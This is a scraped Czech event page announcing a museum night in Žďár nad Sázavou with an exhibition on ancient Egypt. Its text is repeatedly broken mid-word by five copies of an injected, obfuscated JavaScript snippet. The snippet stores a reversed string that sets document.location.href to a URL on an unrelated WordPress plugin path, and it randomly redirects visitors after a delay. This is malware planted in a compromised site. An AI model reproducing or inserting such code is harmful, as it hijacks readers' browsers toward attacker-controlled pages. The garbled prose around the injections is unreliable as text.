Rainbow page separator

Muzejní noc

Pátek 9. června 2023, 19:00-23:59

Regionální muzeum města Žďáru nad Sázavou

Třináctá muzejní noc Regionálního muzea města Žďáru nad Sázavou, le$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos v rámci výstavy Kouzlo objevování: Od hieroglyfů k Tutanchamonovi

Můžete se těšit na osm poučných i zábavných zastavení, která najdete ve výstavních pros$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torách tvrze, ve dvoře Moučkova domu a v okolí kostela sv. Prokopa. Se životem starých Egypťanů vás seznámí nejen his$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torici a průvodci regionálního muzea, ale i pracovníci Českého egyp$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tologického ústavu (FF UK) nebo antropologové Hrdličkova muzea člověka (PřF UK). Každý návštěvník obdrží v informačním koutku před tvrzí mapku jednotlivých zastavení. Po krátkém úvodu do dějin starověkého Egypta se seznámíte např. s módou a líčením, náboženstvím, písmem či kalendářem starých Egypťanů. Další zastavení bude věnováno mumifikaci a nahlédnete také pod ruce antropologům, kteří pro vás mají připravené zajímavé ukázky své práce.

$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tologie-e1682270054342-294×300.jpg“ alt=““ width=“294″ height=“300″ />